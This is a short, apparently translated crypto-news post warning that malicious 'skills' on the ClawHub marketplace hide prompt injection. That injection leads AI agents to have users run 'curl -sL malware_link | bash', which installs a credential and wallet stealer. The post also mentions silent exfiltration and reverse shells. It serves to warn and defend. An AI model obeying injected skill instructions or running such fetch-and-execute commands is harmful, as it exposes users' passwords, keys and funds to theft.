Bill The Investor|Feb 19, 2026 23:42
People in the cryptocurrency industry, don't blindly use OpenClaw!
OpenClaw's skill market ClawHub, the top ranked popular skill "What Would Elon Do" is actually malware! Downloaded thousands of times, Cisco scanning directly exposed 9 vulnerabilities, including 2 CRITICAL level vulnerabilities.
The core gameplay is super cunning:
The attacker can upload "skills" (which are actually Markdown files containing prompt injection) to a new GitHub account within one week.
Disguised as an encrypted trading bot, YouTube summarizer, wallet tracker, with professionally written documentation.
But http://SKILL.md Secretly hiding instructions inside, inducing Claude to tell you to run this command himself:
curl -sL malware_link | bash
Immediately download Atomic Stealer to steal browser passwords, SSH keys, Telegram sessions, crypto wallets, API keys in. env, and even complete keychains.
Even more ruthless is that some skills directly silently curl ping external servers, with zero awareness of data leakage, and can also be changed to open a reverse shell to allow your computer to be remotely controlled by root.
1184 malicious skills have been discovered, with one attacker alone brushing 677 of them! This is not a traditional npm malicious package, it is a 'thoughtful malicious package' - it will deceive AI to spread it, bypass security guidelines, and disguise itself as a popular tool.
Think about it: The AI agent you run locally was originally designed to help you manage emails, schedules, and even transactions, but ended up installing a skill that directly stole your Bitcoin/Ethereum wallet seed or private key, or remotely took over the machine? This is much more aggressive than traditional supply chain attacks because AI has "autonomy" and can decide whether to run that curl or not on its own.
The lesson is bloody:
1. Never install popular skills directly from ClawHub with just one click. First, unzip dangerous commands such as grep curl | bash | eval | fetch yourself.
2. The AI agent ecosystem is now starting with zero trust, and the project team later added VirusTotal scanning, but trust has already collapsed.
3. Nowadays, when looking at any project that combines local AI agents and skill markets, we have to ask one more question: What about the review mechanism? Where is the sandbox? What about prompt injection protection?
AI x Crypto was originally the biggest narrative of the future (a16z just listed 11 major use cases, ERC-8004 mainnet launched, proxy economy took off), but if we can't keep it safe, the first ones to be harvested are likely to be us early bird players.
Everyone, wake up and don't let your AI superpower become a tool for others to steal your BTC.
Share To
Timeline
HotFlash
APP
X
Telegram
CopyLink